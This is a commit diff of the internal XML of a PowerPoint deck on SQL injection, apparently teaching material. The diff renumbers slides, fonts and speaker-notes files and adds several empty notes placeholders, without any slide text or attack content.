<commit_message>
Aggiunto progetto SSMS per utente dedicato e LedgerDB
</commit_message>
<xml_diff>
--- a/2025-10-21.PirlOverflow - SQL Injection crash(ed) course.pptx
+++ b/2025-10-21.PirlOverflow - SQL Injection crash(ed) course.pptx
@@ -5,7 +5,7 @@
     <p:sldMasterId id="2147483674" r:id="rId1"/>
   </p:sldMasterIdLst>
   <p:notesMasterIdLst>
-    <p:notesMasterId r:id="rId44"/>
+    <p:notesMasterId r:id="rId48"/>
   </p:notesMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="256" r:id="rId2"/>
@@ -31,67 +31,71 @@
     <p:sldId id="295" r:id="rId22"/>
     <p:sldId id="307" r:id="rId23"/>
     <p:sldId id="277" r:id="rId24"/>
-    <p:sldId id="280" r:id="rId25"/>
-    <p:sldId id="279" r:id="rId26"/>
-    <p:sldId id="281" r:id="rId27"/>
-    <p:sldId id="299" r:id="rId28"/>
-    <p:sldId id="282" r:id="rId29"/>
-    <p:sldId id="302" r:id="rId30"/>
-    <p:sldId id="303" r:id="rId31"/>
-    <p:sldId id="305" r:id="rId32"/>
-    <p:sldId id="306" r:id="rId33"/>
-    <p:sldId id="304" r:id="rId34"/>
-    <p:sldId id="273" r:id="rId35"/>
-    <p:sldId id="310" r:id="rId36"/>
-    <p:sldId id="311" r:id="rId37"/>
-    <p:sldId id="309" r:id="rId38"/>
-    <p:sldId id="285" r:id="rId39"/>
-    <p:sldId id="300" r:id="rId40"/>
-    <p:sldId id="308" r:id="rId41"/>
-    <p:sldId id="258" r:id="rId42"/>
-    <p:sldId id="264" r:id="rId43"/>
+    <p:sldId id="317" r:id="rId25"/>
+    <p:sldId id="280" r:id="rId26"/>
+    <p:sldId id="279" r:id="rId27"/>
+    <p:sldId id="281" r:id="rId28"/>
+    <p:sldId id="299" r:id="rId29"/>
+    <p:sldId id="282" r:id="rId30"/>
+    <p:sldId id="302" r:id="rId31"/>
+    <p:sldId id="303" r:id="rId32"/>
+    <p:sldId id="305" r:id="rId33"/>
+    <p:sldId id="306" r:id="rId34"/>
+    <p:sldId id="304" r:id="rId35"/>
+    <p:sldId id="316" r:id="rId36"/>
+    <p:sldId id="273" r:id="rId37"/>
+    <p:sldId id="310" r:id="rId38"/>
+    <p:sldId id="311" r:id="rId39"/>
+    <p:sldId id="309" r:id="rId40"/>
+    <p:sldId id="285" r:id="rId41"/>
+    <p:sldId id="300" r:id="rId42"/>
+    <p:sldId id="308" r:id="rId43"/>
+    <p:sldId id="318" r:id="rId44"/>
+    <p:sldId id="314" r:id="rId45"/>
+    <p:sldId id="264" r:id="rId46"/>
+    <p:sldId id="258" r:id="rId47"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
   <p:notesSz cx="6858000" cy="9144000"/>
   <p:embeddedFontLst>
     <p:embeddedFont>
       <p:font typeface="Anonymous Pro" panose="020B0604020202020204" charset="0"/>
-      <p:regular r:id="rId45"/>
-      <p:bold r:id="rId46"/>
-      <p:italic r:id="rId47"/>
-      <p:boldItalic r:id="rId48"/>
-    </p:embeddedFont>
-    <p:embeddedFont>
-      <p:font typeface="Barlow Condensed" panose="00000506000000000000" pitchFamily="2" charset="0"/>
       <p:regular r:id="rId49"/>
       <p:bold r:id="rId50"/>
       <p:italic r:id="rId51"/>
       <p:boldItalic r:id="rId52"/>
     </p:embeddedFont>
     <p:embeddedFont>
-      <p:font typeface="Barlow Condensed Light" panose="00000406000000000000" pitchFamily="2" charset="0"/>
+      <p:font typeface="Barlow Condensed" panose="00000506000000000000" pitchFamily="2" charset="0"/>
       <p:regular r:id="rId53"/>
       <p:bold r:id="rId54"/>
       <p:italic r:id="rId55"/>
       <p:boldItalic r:id="rId56"/>
     </p:embeddedFont>
     <p:embeddedFont>
-      <p:font typeface="Barlow Condensed Medium" panose="00000606000000000000" pitchFamily="2" charset="0"/>
+      <p:font typeface="Barlow Condensed Light" panose="00000406000000000000" pitchFamily="2" charset="0"/>
       <p:regular r:id="rId57"/>
       <p:bold r:id="rId58"/>
       <p:italic r:id="rId59"/>
       <p:boldItalic r:id="rId60"/>
     </p:embeddedFont>
     <p:embeddedFont>
-      <p:font typeface="Barlow Condensed SemiBold" panose="00000706000000000000" pitchFamily="2" charset="0"/>
+      <p:font typeface="Barlow Condensed Medium" panose="00000606000000000000" pitchFamily="2" charset="0"/>
       <p:regular r:id="rId61"/>
       <p:bold r:id="rId62"/>
       <p:italic r:id="rId63"/>
       <p:boldItalic r:id="rId64"/>
     </p:embeddedFont>
     <p:embeddedFont>
+      <p:font typeface="Barlow Condensed SemiBold" panose="00000706000000000000" pitchFamily="2" charset="0"/>
+      <p:regular r:id="rId65"/>
+      <p:bold r:id="rId66"/>
+      <p:italic r:id="rId67"/>
+      <p:boldItalic r:id="rId68"/>
+    </p:embeddedFont>
+    <p:embeddedFont>
       <p:font typeface="Comic Mono" pitchFamily="1" charset="0"/>
-      <p:regular r:id="rId65"/>
+      <p:regular r:id="rId69"/>
     </p:embeddedFont>
   </p:embeddedFontLst>
   <p:defaultTextStyle>
@@ -2800,6 +2804,133 @@
         <p:cNvPr id="1" name="Shape 124">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DA1BA98-ED0D-1C25-705F-9F9C652F9F4A}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF5AB67A-DC7C-7D91-22F5-A9D9F3401923}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9406AA59-C24F-8C07-5686-B3D9EFAA7ED2}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="558434784"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide25.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
               <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C361CE7E-3A7D-5CD3-2AE4-A63D5D8A0B29}"/>
             </a:ext>
           </a:extLst>
@@ -2919,7 +3050,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide25.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide26.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -3046,7 +3177,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide26.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide27.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -3173,7 +3304,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide27.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide28.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -3300,7 +3431,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide28.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide29.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -3418,133 +3549,6 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1690303856"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
-<file path=ppt/notesSlides/notesSlide29.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 124">
-          <a:extLst>
-            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1B9EFDD-426A-D616-1468-BFDC1B0DE87F}"/>
-            </a:ext>
-          </a:extLst>
-        </p:cNvPr>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05AF142E-017B-D673-C759-8412791088BF}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="381000" y="685800"/>
-            <a:ext cx="6096000" cy="3429000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEFDB43B-4DFE-3F8A-75BF-5F8C2EB1E1C1}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="685800" y="4343400"/>
-            <a:ext cx="5486400" cy="4114800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2734908796"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -3689,6 +3693,133 @@
         <p:cNvPr id="1" name="Shape 124">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1B9EFDD-426A-D616-1468-BFDC1B0DE87F}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05AF142E-017B-D673-C759-8412791088BF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEFDB43B-4DFE-3F8A-75BF-5F8C2EB1E1C1}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2734908796"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide31.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
               <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A01623F2-E7E1-443D-2A29-CBE4F5DA93DE}"/>
             </a:ext>
           </a:extLst>
@@ -3808,7 +3939,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide31.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide32.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -3935,7 +4066,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide32.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide33.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4062,7 +4193,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide33.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide34.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4189,7 +4320,134 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide34.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide35.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366DE0C8-C8E7-5F76-CAB4-E3E1043DA36B}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F785B3A2-6938-71DA-BCC3-BB82D7FFA27B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB151C7A-E12B-80EA-9D8A-40B3A7B3B58A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3950318604"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide36.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4316,7 +4574,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide35.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide37.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4443,7 +4701,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide36.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide38.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4570,7 +4828,7 @@
 </p:notes>
 </file>
 
